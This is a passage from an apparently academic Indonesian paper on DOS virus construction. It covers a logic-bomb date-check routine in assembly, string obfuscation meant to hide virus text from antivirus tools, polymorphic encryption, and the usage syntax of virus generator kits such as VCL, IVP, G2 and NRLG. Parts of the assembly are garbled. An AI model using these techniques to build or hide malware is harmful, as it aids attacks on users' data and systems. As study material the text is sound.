int 21h ; Dos intrupt

walaupun masih sederhana tapi dari sini kita dapat mengembangkan lebih lanjut mengenai rutin ini, antara lain dengan mengabungkan tehnik pewarnaan Palete, maupun dengan cara grafik sinus, yang akan menampilkan gambar.

Rutin Port Speaker

Rutin ini juga banyak di pakai dalam pembuatan Virus Komputer, selain untuk menandakan bahwa virus tersebut sudah menulari file / sudah resident di memory juga untuk menandakan kehadiran virus tersebut. contoh virus yang menggunakan rutin ini adalah Mozzart Virus, yang akan memainkan lagu setiap kali komputer yang terinfeksi di booting.

Start : mov cx,0005h ; counter cx = 5 untuk loop jcxz beep_end ; kalau tidak bunyi keluar mov ax,0E07h ; BIOS karakter = BEL
beep_loop : int 010h ; Bunyikan loop

beep_loop ; bunyikan sampai 5 x

cx =5

beep_end :

end: mov ax,04C00h ; DOS terminate function
int 021h

Listing Port Speaker

Timing Bomb / Logic Bomb

Rutin timing bomb / logic bomb pada virus digunakan melalui sutu rutin kondisi yaitu virus akan melaksanakan rutin tertentu apabila dipenuhi suatu kondisi tertentu, dan kondisi yang umum digunakan adalah tanggal, maupun Counter komputer. Tanggal yang di pakai biasanya tanggal-tanggal istimewa bagi si pembuat virus, atau tanggal istimewa pada kejadian dunia, contohnya tanggal lahir si pembuat virus, hari natal 25 Desember, tahun baru 1 Januari, April mop 1 April, jumat tanggal 13, dan lain sebagainya.

Pada penggunaan kondisi tanggal virus akan beraksi apabila telah dipenuhi kondisi tanggal berapa virus akan melaksanakan aksinya. Contoh virus ini yang terkenal adalah Virus Michael Angelo yang akan merusak data pada tanggal 13 Maret, virus Friday 13th, Have a Nice Day virus, Cristmas virus, dan lainnya..

Perintah utama pada badan virus ini adalah membandingkan counter pada program virus dengan counter pada BIOS Clock ( CMOS ) komputer.

Rutin counter yang biasa terdapat pada virus ini adalah sebagai berikut :

; rutin counter

Xor cx,cx

mov ah,04 ; intrupt ah service 04h, Check tanggal !

int 1A

cmp dx,0101 ; 0101, apakah tanggal 1 januari ?

jz Rutin_aktivasi ; kalau ya , jalankan rutin aktivasi

jmp exit ; kalau bukan tanggal 1 januari, keluar.

Logic bomb

Virus-virus dengan rutin ini biasanya muncul tanpa diketahui oleh user, karena biasanya user tidak mengetahui kalau komputernya terserang virus ini, sampai virus telah mendapatkan kondisi counter yang sesuai dengan rutin aktivasinya, baru virus ini akan menunjukan aktivitasnya, dan biasanya aktivitasnya merusak.

Kemampuan Untuk Menyembunyikan Diri Sendiri

Virus-virus dengan kemampuan untuk menyembunyikan diri sendiri adalah virus-virus buatan programmer yang sudah pengalaman, dan virus yang mempunyai rutin untuk menyembunyikan diri akan sulit untuk dideteksi oleh progam AntiVirus. Tehnik-tehnik yang digunakan adalah dengan Enkripsi. Tehnik enkripsi yang banyak digunakan adalah XoR bit.

Suatu program virus yang ter-enkripsi membutuhkan suatu rutin Dekriptor yang akan mengembalikan susunan program virus yang sudah teracak.

V1 (Header virus berisi instruksi JMP D), yaitu instruksi untuk memanggil rutin dekriptor pada badan virus, rutin ini berfungsi untuk mengembalikan susunan badan virus seperti semula, setelah teracak oleh rutin Enkripsi. Sesudah V2 (Badan Virus) dijalankan baru rutin Enkripsi dipanggil untuk mengacak badan virus V2, baru kemudian kendali diberikan pada program asli.

Rutin ini berfungsi untuk mengacak pesan-pesan dalam badan virus agar tidak mudah dilihat oleh user, sehingga kehadiran virus ini sukar untuk diketahui, selain itu enkripsi digunakan untuk mengacak tanda pengenal virus yang digunakan oleh AntiVirus untuk mengidentifikasi suatu virus, tapi dengan tehnologi sekarang antivirus telah menggunakan tehnik Heuristic Engine yaitu suatu tehnik pengenalan pola virus, yang memudahkan untuk menditeksi virus yang terenkripsi, maka dari itu para programmer virus mengembangkan lagi suatu tehnik yaitu Polimorphic Encription , yaitu sutu tehnik untuk mengenkipsi virus dengan kunci yang teracak, sehingga setiap kali suatu virus menginfeksi file maka rutin Dekriptor dan Enkriptornya berbeda, kebanyakan penggunaan Polymorphic Encription ini menggunakan Timer tic / Clock dalam komputer sebagai kunci untuk mendekripsi dan mengEnkripsi badan virus, sehingga banyak kemungkinan kunci untuk pembuka enkripsi virus, karena itu virus ini semakin sulit untuk dideteksi. Contoh dari tehnik enkripsi ditunjukan dalam listing program dibawah ini :

;——————————————-
; Program : Encrypt.COM

; Contoh Penggunaan Encryption Pada Program

; (C) iwing[indovirus.net]

;——————————————-

.MODEL SMALL

.CODE

org 100h

start :jmp mulai

text db “0RNBIRW$DVEN 9N7AAFCSEUGYI KMMANDPAS p)5C3(”,” “

Text2 db “-4TchBiTsM YfRiWl5eM PiVsa rf6u8l9ldyf meln3cDrvy%pltweed “,0

mulai : mov ah,02 ; Service 02h – Cetak karakter

mov bx,42 ; masukan 42 karakter pada bx

again : mov dl, text[bx] ; masukan data text ke dl

cmp dl,”0″ ; bandingkan dl = 0

jz go_text2 ; kalau dl = 0 jmp ke go_text2

int 21h

dec bx ; bx – 1, nilai bx di kurang 1

dec bx ; bx – 1

jmp again ; lompat ke lagi

go_text2 : mov ah,02 ; service cetak karakter

xor bx,bx ; bx di 0 kan

oke : mov dl,text2[bx] ; masukan data ke dl

cmp dl,0 ; bandingkan dl = 0

jz ending ; kalau dl = 0 loncat ke ending

int 21h

inc bx ; data bx ditambah 1, dx+1

inc bx

jmp oke ;kalau dl bukan 0 loop ke oke

ending : int 20h ; DOS Exit Function

end start

;=====================================================

Listing Enkripsi

Pada program diatas akan menghasilkan output sebagai berikut

D:\DOS>encrypt.com

(C) iwing [ indovirus.net ] -This file is fully encrypted

D:\DOS>_

Namun apabila program tersebut di Debug dengan mengunakan Debug.exe, tidak akan menghasilkan tampilan pesan seperti diatas, yang akan keluar adalah :

D:\DOS>debug encrypt.com

-d

1E59:0100 EB 68 90 30 52 4E 42 49-52 57 24 44 56 45 4E 20 .h.0RNBIRW$DVEN
1E59:0110 39 4E 37 41 41 46 43 53-45 55 47 59 49 20 4B 4D 9N7AAFCSEUGYI KM
1E59:0120 4D 41 4E 44 50 41 53 20-70 29 35 43 33 28 20 2D MANDPAS p)5C3( -
1E59:0130 34 54 63 68 42 69 54 73-4D 20 59 66 52 69 57 6C 4TchBiTsM YfRiWl
1E59:0140 35 65 4D 20 50 69 56 73-61 20 72 66 36 75 38 6C 5eM PiVsa rf6u8l
1E59:0150 39 6C 64 79 66 20 6D 65-6C 6E 33 63 44 72 76 79 9ldyf meln3cDrvy
1E59:0160 25 70 6C 74 77 65 65 64-20 00 B4 02 BB 2A 00 2E %pltweed ….*..
1E59:0170 8A 97 03 01 80 FA 30 74-06 CD 21 4B 4B EB F0 B4 ……0t..!KK…

-d

Listing Debug Encrypt.Com

Pesan yang dihasilkan akan terenkripsi, sehingga program tidak mudah dibajak atau virus tidak mudah diketahui keberadaannya, ini dikarenakan pada program digunakan 2 metode enkripsi, yang pertama program menggunakan tehnik DEC bx yang akan mencetak hanya karakter kelipatan 2 dari mulai sebelah kanan, diakhiri oleh 0 (nol) sebagai kuncinya. Yang kedua program menggunakan tehnik INC bx yaitu hanya menampilkan karakter kelipatan 2 saja yang dimulai dari karakter sebelah kiri, dan diakhiri dengan 0 (nol), sebagai kuncinya.

Enkripsi dengan DEC bx yaitu :

text db “0N[ISWUDREI VNOADFNSIU]Y GKNMINWPIS p)5C3(”,” ”

-> [ S U R I V O D N I ] G N I W I ) C (

Hasilnya : (C) IWING [ INDOVIRUS ]

Enkripsi dengan INC bx yaitu :

Text2 db “-4TchBiTsM YfRiWl5eM PiVsa rf6u8l9ldyf meln3cDrvy%pltweed “,0 –> kunci

-> – T h i s f I l e I s f u l l y e n c r y p t e d

Hasilnya : This file is fully encrypted

Contoh program diatas dapat digunakan untuk tehnik enkripsi pada virus, walaupun sederhana namun cukup efektif untuk menyembunyikan pesan-pesan dalam badan virus.

Virus Generator

Diantara banyak program-program Virus Komputer, sebenarnya yang lebih berbahaya adalah Virus Generator, yaitu suatu program yang membuat virus instant / virus yang sudah jadi, dari sebuah Virus Generator saja dapat dihasilkan puluhan Virus Komputer, yang berbeda jenis dan karakternya, sehingga dalam waktu singkat orang yang mendapatkan virus generator dapat membuat virus seperti yang diinginkannya, tanpa orang tersebut mengerti tentang pemrograman assembler.

Contoh-contoh virus generator yang akan dibahas dalam Penulisan ilmiah ini ada 5 buah, yaitu :

1. VCL ( Virus Creation Laboratory )

2. IVP ( Instan Virus Production Kit )

3. G2

4. NRLG (Nuke Randomic Life Generator)

VCL (Virus Creation Laboratory)

Program virus generator ini menggunakan system menu driven dalam suatu integrated environment, sekilas program ini mirip dengan Turbo Pascal, karena system menunya Pulldown Menu.

Program VCL terdiri menu-menu yaitu : File, Option, Efects, Make, Configuration. Dimana menu file terdiri dari : New, Open, Save, Save As, Change Dir , Information , DOS Shell , dan Quit.

Pada menu Option program VCL, menyediakan berbagai macam jenis virus yang dapat dihasilkan, dan kombinasi antara Efek maupun cara-cara penyebaran antara lain

1. Apending ( Menempel ) Untuk file EXE dan COM

2. Overwriting ( Menimpa) Untuk file EXE dan COM

3. Spawning / Companion , untuk file EXE

4. Logic Bomb

5. Trojan Horse

Selain itu menu Option juga menyediakan cara-cara penyerangan, seperti melalui Directory tree, Curent Directory, Root Directory, juga jumlah penyerangan, seperti menulari 3 file dalam satu kali jalan, enkripsi ,dan lainnya..

Selain itu pada menu Option ini kita dapat memasukan Teks apa saja ke tubuh virus.
Pada menu Efects, program VCL ini menawarkan berbagai macam efect untuk virus.

Selain itu VCL juga menyediakan fasilitas untuk menambah Efect sesuai dengan keinginan kita, dengan cara mengabungkan rutin Efect kita dengan program VCL.

IVP ( Instan Virus Production Kit)

Program IVP yang Penulis ambil adalah yang versi IVP V.1.7, Program IVP ini dibuat oleh Admiral Baily seorang anggota Y.A.M (Youth Agains McAfee). IVP berbeda dengan VCL karena IVP tidak berupa Menu Driven atau Integrated Environment, tapi berbentuk Command Line. Dan kita memerlukan sebuah file Configuration untuk dapat menghasilkan virus. Defaultnya adalah IVP.CFG, yang didalamnya berisi karakteristik Virus yang akan dibuat. Cara pengunaan IVP sangat mudah, pertama kita tentukan dahulu jenis virus yang akan kita buat, semua karakteristik virus, kita masukan dalam file .CFG, seperti nama virus, metode penyerangan, pengaman, rutin aktivasi, efek virus, dan lain-lain. Setelah kita selesai memasukan data-data dalam file konfigurasi, selanjutnya kita menjalankan IVP dalam Command Line , dengan Syntax :

C:\>IVP [Nama_file.CFG]

Setelah itu akan terbentuk file dengan nama sesuai dengan nama yang kita berikan dalam file konfigurasi, dengan Extension .ASM, selanjutnya kita dapat mengkompile file tadi dengan Turbo asembler (TASM) / MASM, setelah itu di link menggunakan Turbo Link (TLINK) / EXE2BIN untuk MASM.

G ²

Program G ² ini di tulis oleh Dark Angel dari Phalcom/SKISM, program G ² ini dikeluarkan setelah Phalcom/SKISM mengeluarkan program virus generator yang terkenal yaitu PS-MPC (Phalcom/SKISM Mass Production Code Generator), cara kerja program G ² ini sama dengan IVP, yaitu menggunakan Command Line, dan membutuhkan file Konfigurasi. Hanya bedanya G ² membutuhkan sebuah file data. File data ini dapat juga digunakan untuk PS-MPC, begitu juga sebaliknya Syntax penulisan G ², yaitu :

C:\>G2.EXE [File_Config1.cfg] [file_config2.cfg]

Contohnya : G2.EXE G2.Dat G2.Cfg

Program G ² ini juga menawarkan berbagai jenis virus, dengan rutin aktivasi, pengaman, metode penyerangan, maupun efek virus yang beraneka ragam, juga menawarkan virus-virus TSR (Terminate And Stay Residence).

NRLG (Nuke Randomic Life Generator)

Program NRLG ini ditulis oleh Azrael dari kelompok [NUKE] Warez, program virus generator ini mempunyai tampilan yang berseni, selain tampilannya yang Integrated Environment yang berupa Pulldown menu, juga bentuk-bentuk hurufnya yang menarik

Dalam main menu NRLG terdapat About, New Monster, Create dan Quit, dimana menu About berisi nama-nama anggota pembuat NRLG dan tempat tinggalnya. Sedangkan menu New Monster berisi jenis-jenis virus yang dapat dihasilkan oleh NRLG, rutin aktivasi, pengaman, berikut Efek-efeknya.

Rutin aktivasi dapat di gunakan tanggal, bulan maupun tahun yang diinginkan, sedangkan pengaman terdiri dari Encription, Directory Stealth, maupun memory stealth, selain itu pengaman juga dilakukan dengan menghapus program anti virus yang ada, baik yang TSR maupun yang ada di Hard Disk.